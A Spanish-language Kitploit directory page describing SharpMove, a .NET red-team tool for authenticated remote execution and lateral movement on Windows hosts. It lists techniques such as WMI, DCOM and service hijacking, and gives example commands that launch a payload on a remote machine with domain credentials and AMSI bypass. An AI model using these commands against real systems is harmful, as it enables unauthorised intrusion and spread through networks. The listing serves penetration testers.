Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SharpMove — Proyecto .NET para realizar ejecución remota autenticada | Kitploit
Herramientas/GitHubGitHub/0xthirteen/sharpmove
Movimiento LateralPost-ExplotaciónPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHub0xthirteen/sharpmove

SharpMove

Proyecto .NET para realizar ejecución remota autenticada

Ver Repositorio
41070hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SharpMove - Ejecución autenticada .NET para hosts remotos

Compilación

Para compilar, abre el proyecto de Visual Studio y compílalo para la versión Release.

Opciones

  • WMI
  • SCM
  • DCOM (Múltiples)
  • Programador de tareas
  • Secuestro de DLL de servicio
  • Secuestro de servidor DCOM
  • Modificar tarea programada
  • Modificar binpath de servicio
root@kitploit:~
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
root@kitploit:~
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
root@kitploit:~
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
root@kitploit:~
SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
root@kitploit:~
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
root@kitploit:~
SharpMove.exe action=modschtask computername=remote.host.local command="C:\windows\temp\payload.exe" username=domain\user password=password taskname=TestTask
root@kitploit:~
SharpMove.exe action=hijackdcom computername=remote.host.local clsid={40bdc4e5-d532-42e6-b667-1ab890fdebcf}
root@kitploit:~
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

Parte de MoveKit

Descargar herramienta